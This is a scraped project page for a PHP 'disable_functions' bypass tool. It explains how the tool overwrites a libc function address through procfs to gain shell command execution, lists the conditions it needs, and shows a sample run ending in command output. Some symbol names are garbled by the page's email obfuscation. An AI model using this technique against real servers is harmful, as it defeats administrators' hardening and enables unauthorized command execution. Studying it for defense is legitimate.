Need help with php_disable_functions_bypass?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

133 Stars 14 Forks 6 Commits 1 Opened issues


procfs-based PHP sandbox bypass

Services available


Need anything else?

Contributors list

No Data

PHP disable_functions bypass

Original topic on RDot forum (russian):

This script exploits the possibility to write to procfs and rewrites the [email protected] address with [email protected] address. After that you can run shell commands with, for example, readfile(). Addresses are obtained automatically after ELF parsing of libc and php binary.

Conditions: * Linux kernel version >= 2.98, * PHP-CGI or PHP-FPM (modern Apache versions with modphp call setuid, thus, there's no access to procfs), * Linux x64 (you can adjust offsets to make it work on x32 system), * openbasedir = Off (or you should be able to bypass it to read /lib and to read and write in /proc).

Example of usage:

$ php procfs_bypass.php
[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org)
[*] Trying to get [email protected] offset in PHP binary
[+] Address is 0xe94998
[*] Libc location: /lib/x86_64-linux-gnu/
[*] Trying to get open and system symbols from Libc
[+] Got it. Seeking for address in memory
[*] [email protected] addr: 0x7f150f86d150
[*] [email protected] addr: 0x7f150f7c7530
[*] Rewriting [email protected] address
[+] Address written. Executing cmd
uid=1000(beched) gid=1000(beched) группы=1000(beched),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),110(sambashare)

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.